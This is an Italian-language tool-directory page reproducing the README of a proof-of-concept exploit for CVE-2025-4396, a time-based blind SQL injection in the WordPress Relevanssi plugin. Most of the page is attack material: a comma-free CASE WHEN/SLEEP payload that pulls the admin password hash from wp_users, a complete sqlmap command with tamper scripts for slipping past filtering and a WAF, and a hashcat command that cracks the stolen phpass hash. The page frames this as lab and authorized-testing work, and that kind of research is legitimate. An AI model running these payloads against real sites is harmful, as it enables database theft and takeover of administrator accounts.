Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-4396 — CVE-2025-4396 - WordPress Relevanssi SQL Injection Blind Basata sul Tempo | Kitploit
Strumenti/GitHubGitHub/sup3rdav3/cve-2025-4396
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubsup3rdav3/cve-2025-4396

CVE-2025-4396

CVE-2025-4396 - WordPress Relevanssi SQL Injection Blind Basata sul Tempo

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-4396 — Iniezione SQL in Relevanssi (Blind basata sul tempo)

Disclaimer: Questo repository è destinato esclusivamente a test di penetrazione autorizzati, ricerca sulla sicurezza e scopi didattici. L'accesso non autorizzato a sistemi informatici è illegale e non etico.


Panoramica

Un exploit proof-of-concept per una vulnerabilità di SQL injection blind basata sul tempo nel plugin WordPress Relevanssi 4.24.4. Questa implementazione affronta specificamente ambienti rafforzati dove:

  • Le virgole sono filtrate — rompendo la sintassi standard SUBSTR(str, pos, len) e IF(cond, true, false)
  • Comportamento greedy di sleep — causando l'esecuzione di SLEEP() da parte di MySQL prima di valutare l'espressione completa, producendo falsi positivi

Contesto

In alcuni ambienti (ad esempio, il lab DVWP), i payload standard di SQL injection falliscono per due ragioni principali:

ProblemaEffetto
Rimozione virgoleRompe SUBSTR(str, pos, len) e IF(cond, true, false)
SLEEP() greedyMySQL valuta sleep prima dell'espressione booleana completa, causando falsi positivi

Entrambi i problemi richiedono soluzioni mirate — coperte dagli approcci manuali e automatici di seguito.


Exploit manuale (asy.py)

Uno script Python asincrono che fornisce un'estrazione chirurgica carattere per carattere. Evita il sovraccarico degli strumenti automatici e aggira il filtraggio delle virgole tramite la logica CASE WHEN.

Caratteristiche

FunzionalitàImplementazione
I/O asincronoaiohttp per richieste non bloccanti

Logica di iniezione principale

root@kitploit:~
# Comma-less, CASE WHEN-based time-based payload
condition = f"ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1) FROM {pos} FOR 1))>{mid}"
injection = f"1*(SELECT CASE WHEN ({condition}) THEN SLEEP(3) ELSE 1 END)"

Perché CASE WHEN invece di IF()? IF() usa virgole ed è soggetto a valutazione greedy. CASE WHEN valuta pigramente, garantendo che SLEEP() venga attivato solo quando la condizione è genuinamente TRUE.


Exploit automatico (SQLMap)

SQLMap può automatizzare la scoperta in questo ambiente utilizzando specifici script tamper e flag.

Comando

root@kitploit:~
python3 sqlmap.py -u "http://localhost:31337/?s=test&cats=1*" \
  --tamper=commalessmid,if2case,between \
  --technique=T \
  --dbms=MySQL \
  --no-cast \
  --batch \
  --threads=1 \
  --dbs

Riferimento flag

Nota su --threads=1: Questo è essenziale per un'estrazione affidabile. Più thread causano la sovrapposizione dei ritardi di sleep, corrompendo i tempi della ricerca binaria e producendo output distorto.


Risultati di laboratorio

CampoValore
TargetTabella di WordPress

Cracking dell'hash

root@kitploit:~
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
  • Il modo -m 400 ha come target gli hash phpass
  • L'attacco -a 0 è un attacco dizionario diretto usando rockyou.txt

Riferimenti

  • Relevanssi Plugin — WordPress.org
  • SQLMap Tamper Scripts
  • OWASP: Iniezione SQL Blind
  • phpass — Framework di hashing delle password
Scarica lo strumento
Payload senza virgoleSintassi SUBSTR(str FROM pos FOR len)
Logica non greedyCASE WHEN garantisce che SLEEP() venga eseguito solo su TRUE
FlagScopo
--tamper=commalessmid,if2caseRiscrive i payload in SQL senza virgole; sostituisce IF() con CASE WHEN
--tamper=betweenSostituisce i confronti > con BETWEEN per bypassare ulteriormente il WAF
--technique=TLimita alla sola injection blind basata sul tempo
--no-castImpedisce i wrapper CAST() che introducono virgole vietate
--threads=1Garantisce la precisione dei tempi — richieste concorrenti causano sovrapposizione dei ritardi di sleep
wp_users
Utenteadmin (ID = 1)
Hash estrattoREDACTED
Algoritmophpass (hashing password standard di WordPress)